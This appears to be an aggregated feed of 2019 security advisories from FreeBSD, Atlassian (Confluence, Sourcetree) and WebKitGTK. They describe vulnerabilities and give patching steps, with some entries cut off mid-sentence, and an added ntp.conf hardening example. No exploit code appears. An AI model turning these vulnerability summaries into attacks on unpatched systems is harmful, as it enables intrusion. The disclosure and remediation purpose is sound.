Afterwards, restart hostapd(8) or wpa_supplicant(8).

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch.asc
# gpg --verify wpa-12.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch.asc
# gpg --verify wpa-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r346980
releng/12.0/                                                      r347587
stable/11/                                                        r346981
releng/11.2/                                                      r347588
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://w1.fi/security/2019-1>
<https://w1.fi/security/2019-2>
<https://w1.fi/security/2019-3>
<https://w1.fi/security/2019-4>
<https://w1.fi/security/2019-5>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9494>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9495>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9496>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9497>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9498>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9499>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11555>

The la
FreeBSD Security Advisory FreeBSD-SA-19:04.ntp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:04.ntp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Authenticated denial of service in ntpd

Category:       contrib
Module:         ntp
Announced:      2019-05-14
Credits:        Magnus Stubman
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-07 13:45:36 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:02:56 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-07 13:45:36 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:06:26 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-8936

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP)
used to synchronize the time of a computer system to a reference time
source.  The ntpd(8) daemon uses a protocol called mode 6 to both get
status information from the running ntpd(8) daemon and configure it on the
fly.  This protocol is typically used by the ntpq(8) program, among others.

II.  Problem Description

A crafted malicious authenticated mode 6 packet from a permitted network
address can trigger a NULL pointer dereference.

Note that for this attack to work, the sending system must be on an address
from which the target ntpd(8) accepts mode 6 packets, and must use a private
key that is specifically listed as being used for mode 6 authorization.

III. Impact

The ntpd daemon can crash due to the NULL pointer dereference, causing a
denial of service.

IV.  Workaround

Use 'restrict noquery' in the ntpd configuration to limit addresses that can
send mode 6 queries.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart the ntpd service:

# service ntpd restart

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch.asc
# gpg --verify ntp.patch.asc

[FreeBSD 11.2-RELEASE/11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch.asc
# gpg --verify ntp-11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the ntpd service, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r344884
releng/12.0/                                                      r347589
stable/11/                                                        r344884
releng/11.2/                                                      r347590
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<http://support.ntp.org/bin/view/Main/SecurityNotice#March_2019_ntp_4_2_8p13_NTP_Rele>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:04.ntp.asc>
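The workaround in section IV names the 'restrict noquery' keyword without showing where it sits in ntp.conf. The fragment below is an added illustration, not text from the FreeBSD advisory or the NTP project: it denies mode 6 and mode 7 queries to everyone by default, keeps ntpq(8) working from localhost, and grants one monitoring station query-only access. The address 192.0.2.10 is a constructed documentation address; substitute the hosts that actually need to query the daemon.

```conf
# /etc/ntp.conf access control (added example, not from the advisory).
#
# Default policy for every address: serve time, but refuse mode 6/7 status
# queries (noquery), runtime reconfiguration (nomodify), trap requests
# (notrap) and unsolicited peering (nopeer).  kod rate-limits abusive clients.
restrict default kod nomodify notrap nopeer noquery

# Localhost keeps full access so ntpq(8) on the box itself still works.
restrict 127.0.0.1
restrict ::1

# Constructed example: one monitoring host may read status (ntpq -p) but the
# absence of "noquery" only opens the query path; nomodify/notrap stay set.
restrict 192.0.2.10 nomodify notrap
```

With this in place only 127.0.0.1, ::1 and the listed monitoring host can reach the mode 6 code path at all, which is the precondition the advisory's Problem Description spells out; the second precondition, holding a key listed for mode 6 authorization, is unchanged, so the restriction is a containment measure and the patch is still the fix.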
Confluence Security Advisory - 2019-04-17
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This email refers to the advisory found at
https://confluence.atlassian.com/x/d5e8OQ .

CVE ID:

* CVE-2019-3398.

Product: Confluence Server and Confluence Data Center.

Affected Confluence Server and Confluence Data Center versions:

6.6.0 <= version < 6.6.13
6.7.0 <= version < 6.12.4
6.13.0 <= version < 6.13.4
6.14.0 <= version < 6.14.3
6.15.0 <= version < 6.15.2

Fixed Confluence Server and Data Center versions:

* for 6.6.x, Confluence Server 6.6.13 has been released with a fix for this
  issue.
* Confluence Server 6.12.4 has been released with a fix for this issue.
* for 6.13.x, Confluence Server 6.13.4 has been released with a fix for this
  issue.
* for 6.14.x, Confluence Server 6.14.3 has been released with a fix for this
  issue.
* for 6.15.x, Confluence Server 6.15.2 has been released with a fix for this
  issue.

Summary:

This advisory discloses a critical severity security vulnerability.
Versions of Confluence starting with version 2.0.0 before 6.6.13 (the fixed
version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x),
from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before
6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are
affected by this vulnerability.

Customers who have upgraded Confluence to version 6.6.13 or 6.12.4 or 6.13.4
or 6.14.3 or 6.15.2 are not affected.

Customers who have downloaded and installed Confluence >= 6.6.0 but less
than 6.6.13 (the fixed version for 6.6.x) or who have downloaded and
installed Confluence >= 6.7.0 but less than 6.12.4 or who have downloaded
and installed Confluence >= 6.13.0 but less than 6.13.4 (the fixed version
for 6.13.x) or who have downloaded and installed Confluence >= 6.14.0 but
less than 6.14.3 (the fixed version for 6.14.x) or who have downloaded and
installed Confluence >= 6.15.0 but less than 6.15.2 (the fixed version for
6.15.x) please upgrade your Confluence installations immediately to fix this
vulnerability.

Path traversal in the downloadallattachments resource - CVE-2019-3398

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

Confluence Server and Data Center had a path traversal vulnerability in the
downloadallattachments resource. A remote attacker who has permission to add
attachments to pages and / or blogs, or to create a new space or personal
space, or who has 'Admin' permissions for a space, can exploit this path
traversal vulnerability to write files to arbitrary locations which can lead
to remote code execution on systems that run a vulnerable version of
Confluence Server or Data Center. Versions of Confluence starting with
version 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before
6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed
version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for
6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-58102 .

Fix:

To address this issue, we've released the following versions containing a
fix:

* Confluence Server and Confluence Data Center version 6.6.13
* Confluence Server and Confluence Data Center version 6.12.4
* Confluence Server and Confluence Data Center version 6.13.4
* Confluence Server and Confluence Data Center version 6.14.3
* Confluence Server and Confluence Data Center version 6.15.2

Remediation:

Upgrade Confluence to version 6.15.2 or higher.

The vulnerabilities and fix versions are described above. If affected, you
should upgrade to the latest version immediately.

If you are running Confluence Server 6.6.x and cannot upgrade to 6.15.2,
upgrade to version 6.6.13.
If you are running Confluence Server 6.13.x and cannot upgrade to 6.15.2,
upgrade to version 6.13.4.
If you are running Confluence Server 6.14.x and cannot upgrade to 6.15.2,
upgrade to version 6.14.3.

For a full description of the latest version of Confluence Server, see the
release notes found at
https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You
can download the latest version of Confluence Server from the download
centre found at https://www.atlassian.com/software/confluence/download.

Support:

If you have questions or concerns regarding this advisory, please raise a
support request at https://support.atlassian.com/.
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0002
WebKitGTK and WPE WebKit Security Advisory                 WSA-2019-0002

Date reported           : April 10, 2019
Advisory ID             : WSA-2019-0002
WebKitGTK Advisory URL  : https://webkitgtk.org/security/WSA-2019-0002.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0002.html
CVE identifiers         : CVE-2019-6201, CVE-2019-6251, CVE-2019-7285,
                          CVE-2019-7292, CVE-2019-8503, CVE-2019-8506,
                          CVE-2019-8515, CVE-2019-8518, CVE-2019-8523,
                          CVE-2019-8524, CVE-2019-8535, CVE-2019-8536,
                          CVE-2019-8544, CVE-2019-8551, CVE-2019-8558,
                          CVE-2019-8559, CVE-2019-8563, CVE-2019-11070.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2019-6201
    Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to dwfault working with ADLab of Venustech.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-6251
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to Dhiraj.
    Processing maliciously crafted web content may lead to spoofing.
    WebKitGTK and WPE WebKit were vulnerable to a URI spoofing attack similar
    to the CVE-2018-8383 issue in Microsoft Edge.

CVE-2019-7285
    Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to dwfault working at ADLab of Venustech.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A use after free issue was addressed with improved memory
    management.

CVE-2019-7292
    Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team.
    Processing maliciously crafted web content may result in the disclosure
    of process memory. A validation issue was addressed with improved logic.

CVE-2019-8503
    Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to Linus Särud of Detectify.
    A malicious website may be able to execute scripts in the context of
    another website. A logic issue was addressed with improved validation.

CVE-2019-8506
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to Samuel Groß of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A type confusion issue was addressed with improved memory
    handling.

CVE-2019-8515
    Versions affected: WebKitGTK before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to James Lee, @Windowsrcer.
    Processing maliciously crafted web content may disclose sensitive user
    information. A cross-origin issue existed with the fetch API. This was
    addressed with improved input validation.

CVE-2019-8518
    Versions affected: WebKitGTK before 2.22.7 and WPE WebKit before 2.22.5.
    Credit to Samuel Groß of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-8523
    Versions affected: WebKitGTK before 2.22.7 and WPE WebKit before 2.22.5.
    Credit to Apple.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-8524
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to G. Geshev working with Trend Micro Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-8535
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to Zhiyang Zeng, @Wester, of Tencent Blade Team.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A memory corruption issue was addressed with improved state
    management.

CVE-2019-8536
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to Apple.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A memory corruption issue was addressed with improved memory
    handling.

CVE-2019-8544
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to an anonymous researcher.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A memory corruption issue was addressed with improved memory
    handling.

CVE-2019-8551
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to Ryan Pickren, ryanpickren.com.
    Processing maliciously crafted web content may lead to universal cross
    site scripting. A logic issue was
Atlassian - Confluence Security Advisory - 2019-03-20
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This email refers to the advisory found at
https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20 .

CVE ID:

* CVE-2019-3395.
* CVE-2019-3396.

Product: Confluence Server and Confluence Data Center.

Affected Confluence Server and Confluence Data Center product versions:

6.6.0 <= version < 6.6.12
6.12.0 <= version < 6.12.3
6.13.0 <= version < 6.13.3
6.14.0 <= version < 6.14.2

Fixed Confluence Server and Confluence Data Center product versions:

* for 6.6.x, Confluence Server and Data Center 6.6.12 have been released
  with a fix for these issues.
* for 6.12.x, Confluence Server and Data Center 6.12.3 have been released
  with a fix for these issues.
* for 6.13.x, Confluence Server and Data Center 6.13.3 have been released
  with a fix for these issues.
* for 6.14.x, Confluence Server and Data Center 6.14.2 have been released
  with a fix for these issues.

Summary:

This advisory discloses critical severity security vulnerabilities.
Versions of Confluence Server and Data Center before 6.6.12 (the fixed
version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for
6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x)
and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are
affected by these vulnerabilities.

Customers who have upgraded Confluence to version 6.6.12 or 6.12.3 or 6.13.3
or 6.14.2 are not affected.

Customers who have downloaded and installed Confluence >= 6.6.0 but less
than 6.6.12 (the fixed version for 6.6.x) or who have downloaded and
installed Confluence >= 6.12.0 but less than 6.12.3 (the fixed version for
6.12.x) or who have downloaded and installed Confluence >= 6.13.0 but less
than 6.13.3 (the fixed version for 6.13.x) or who have downloaded and
installed Confluence >= 6.14.0 but less than 6.14.2 (the fixed version for
6.14.x) please upgrade your Confluence installations immediately to fix
these vulnerabilities.

WebDAV vulnerability (CVE-2019-3395)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

A remote attacker is able to exploit a Server-Side Request Forgery (SSRF)
vulnerability via the WebDAV plugin to send arbitrary HTTP and WebDAV
requests from a Confluence Server or Data Center instance. Versions of
Confluence before version 6.6.7 (the fixed version for 6.6.x), from version
6.7.0 before 6.7.3 (the fixed version for 6.7.x), from version 6.8.0 before
6.8.5 (the fixed version for 6.8.x) and from version 6.9.0 before 6.9.3 (the
fixed version for 6.9.x) are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-57971 .

Remote code execution via Widget Connector macro (CVE-2019-3396)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

There was a server-side template injection vulnerability in Confluence via
Widget Connector. An attacker is able to exploit this issue to achieve path
traversal and remote code execution on systems that run a vulnerable version
of Confluence. Versions of Confluence before version 6.6.12 (the fixed
version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for
6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x)
and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are
affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-57974 .

Fix:

To address these issues, we have released the following versions of
Confluence Server and Data Center containing a fix:

* version 6.6.12
* version 6.12.3
* version 6.13.3
* version 6.14.2

Remediation:

Upgrade Confluence Server and Data Center to version 6.14.2 or higher.

The vulnerabilities and fix versions are described above. If affected, you
should upgrade to the latest version immediately.

If you are running Confluence Server and/or Data Center 6.6.x and cannot
upgrade to 6.14.2, upgrade to version 6.6.12.
If you are running Confluence Server and/or Data Center 6.12.x and cannot
upgrade to 6.14.2, upgrade to version 6.12.3.
If you are running Confluence Server and/or Data Center 6.13.x and cannot
upgrade to 6.14.2, upgrade to version 6.13.3.

For a full description of the latest version of Confluence Server and Data
Center, see the release notes found at
https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You
can downl
March 2019 Sourcetree Advisory - Multiple Remote Code Execution Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

This email refers to the advisory found at
https://confluence.atlassian.com/display/SOURCETREEKB/Sourcetree+Security+Advisory+2018-03-06 .

CVE ID:

* CVE-2018-17456.
* CVE-2018-20234.
* CVE-2018-20235.
* CVE-2018-20236.

Product: Sourcetree.

Affected Sourcetree product versions:

1.2 <= version < 3.1.1
0.5a <= version < 3.0.17

Fixed Sourcetree product versions:

* for macOS, Sourcetree 3.1.1 has been released with a fix for these issues.
* for Windows, Sourcetree 3.0.17 has been released with a fix for these
  issues.

Summary:

This advisory discloses critical severity security vulnerabilities.
Versions of Sourcetree are affected by these vulnerabilities.

Customers who have upgraded Sourcetree to version 3.1.1 (Sourcetree for
macOS) or 3.0.17 (Sourcetree for Windows) are not affected.

Customers who have downloaded and installed Sourcetree >= 1.2 but less than
3.1.1 (the fixed version for macOS) or who have downloaded and installed
Sourcetree >= 0.5a but less than 3.0.17 (the fixed version for Windows)
please upgrade your Sourcetree installations immediately to fix these
vulnerabilities.

Sourcetree for macOS - Git submodules vulnerability (CVE-2018-17456)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

The embedded version of Git used in Sourcetree for macOS was vulnerable to
CVE-2018-17456. An attacker can exploit this issue if they can commit to a
Git repository linked in Sourcetree for macOS. This allows them to execute
arbitrary code on systems running a vulnerable version of Sourcetree for
macOS. Versions of Sourcetree for macOS starting with version 1.2 before
version 3.1.1 are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREE-6394 .

Sourcetree for Windows - Git submodules vulnerability (CVE-2018-17456)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

The embedded version of Git used in Sourcetree for Windows was vulnerable to
CVE-2018-17456. An attacker can exploit this issue if they can commit to a
Git repository linked in Sourcetree for Windows. This allows them to execute
arbitrary code on systems running a vulnerable version of Sourcetree for
Windows. Versions of Sourcetree for Windows starting with version 0.5a
before version 3.0.17 are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-11292 .

Sourcetree for macOS - Mercurial hooks vulnerability (CVE-2018-20234)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

There was an argument injection vulnerability in Sourcetree for macOS via
filenames in Mercurial repositories. A remote attacker with permission to
commit to a Mercurial repository linked in Sourcetree for macOS is able to
exploit this issue to gain code execution on the system. Versions of
Sourcetree for macOS starting with version 1.2 before version 3.1.1 are
affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREE-6391 .

Sourcetree for Windows - Mercurial hooks vulnerability (CVE-2018-20235)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The scale
allows us to rank the severity as critical, high, moderate or low. This is
our assessment and you should evaluate its applicability to your own IT
environment.

Description:

There was an argument injection vulnerability in Sourcetree for Windows via
filenames in Mercurial repositories. A remote attacker with permission to
commit to a Mercurial repository linked in Sourcetree for Windows is able to
exploit this issue to gain code execution on the system. Versions of
Sourcetree for Windows starting with version 0.5a before version 3.0.15 are
affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-11289 .

Sourcetree for Windows - URI handling vulnerability (CVE-2018-20236)

Severity:

Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels
WebKitGTK+ and WPE WebKit Security Advisory WSA-2019-0001
WebKitGTK+ and WPE WebKit Security Advisory                WSA-2019-0001

Date reported           : February 08, 2019
Advisory ID             : WSA-2019-0001
WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2019-0001.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0001.html
CVE identifiers         : CVE-2019-6212, CVE-2019-6215, CVE-2019-6216,
                          CVE-2019-6217, CVE-2019-6226, CVE-2019-6227,
                          CVE-2019-6229, CVE-2019-6233, CVE-2019-6234.

Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit.

CVE-2019-6212
    Versions affected: WebKitGTK+ before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to an anonymous researcher.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-6215
    Versions affected: WebKitGTK+ before 2.22.6 and WPE WebKit before 2.22.4.
    Credit to Lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A type confusion issue was addressed with improved memory
    handling.

CVE-2019-6216
    Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3.
    Credit to Fluoroacetate working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-6217
    Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3.
    Credit to Fluoroacetate working with Trend Micro's Zero Day Initiative,
    Proteas, Shrek_wzw, and Zhuo Liang of Qihoo 360 Nirvan Team.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-6226
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to Apple.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. Multiple memory corruption issues were addressed with improved
    memory handling.

CVE-2019-6227
    Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3.
    Credit to Qixun Zhao of Qihoo 360 Vulcan Team.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A memory corruption issue was addressed with improved memory
    handling.

CVE-2019-6229
    Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3.
    Credit to Ryan Pickren.
    Processing maliciously crafted web content may lead to universal cross
    site scripting. A logic issue was addressed with improved validation.

CVE-2019-6233
    Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2.
    Credit to G. Geshev from MWR Labs working with Trend Micro's Zero Day
    Initiative.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A memory corruption issue was addressed with improved memory
    handling.

CVE-2019-6234
    Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2.
    Credit to G. Geshev from MWR Labs working with Trend Micro's Zero Day
    Initiative.
    Processing maliciously crafted web content may lead to arbitrary code
    execution. A memory corruption issue was addressed with improved memory
    handling.

We recommend updating to the latest stable versions of WebKitGTK+ and WPE
WebKit. It is the best way to ensure that you are running safe versions of
WebKit. Please check our websites for information about the latest stable
releases.

Further information about WebKitGTK+ and WPE WebKit security advisories can
be found at: https://webkitgtk.org/security.html or
https://wpewebkit.org/security/.

The WebKitGTK+ and WPE WebKit team,
February 08, 2019
FreeBSD Security Advisory FreeBSD-SA-19:02.fd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

FreeBSD-SA-19:02.fd                                         Security Advisory
                                                          The FreeBSD Project

Topic:          File description reference count leak

Category:       core
Module:         unix
Announced:      2019-02-05
Credits:        Peter Holm
Affects:        FreeBSD 12.0
Corrected:      2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE)
                2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3)
                2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE)
CVE Name:       CVE-2019-5596

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication.  It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.

II.  Problem Description

FreeBSD 12.0 attempts to handle the case where the receiving process does
not provide a sufficiently large buffer for an incoming control message
containing rights.  In particular, to avoid leaking the corresponding
descriptors into the receiving process' descriptor table, the kernel handles
the truncation case by closing descriptors referenced by the discarded
message.

The code which performs this operation failed to release a reference
obtained on the file corresponding to a received right.  This bug can be
used to cause the reference counter to wrap around and free the file
structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from a
jail.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch.asc
# gpg --verify fd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r343785
releng/12.0/                                                      r343790
stable/11/                                                        r343786
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5596>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:02.fd.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1YFfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cK7+w/+JeFIVM0QQC1R4wJFmT3bBaRumxGCx5PN5Ufe7ub/ztwsKQKJeps1aiS3
fzw3Ck1K7+joeG+cNwZNihmAyEa2Hgk+FDhQBX531yrwF1jQ2A2oKGfkhs5e02Ng
k16MV9pVlNP1zQ3wFVBjFCCvBuVJ0A8XTxALY7ivZlj2edgSH1eL4SaP1mrSD2Xu
pR2amN7WkAaIqvATK0VkWjYp6kUXtI8CBtdP3hpKz88rpYoZfWxupqtghnxgjIqt
iuTOhbemvYuBvB+ErbtU/6Z4ffoHt9Csrk2MM56/RZRwyHmtC4CFqtxClrUpOoa2
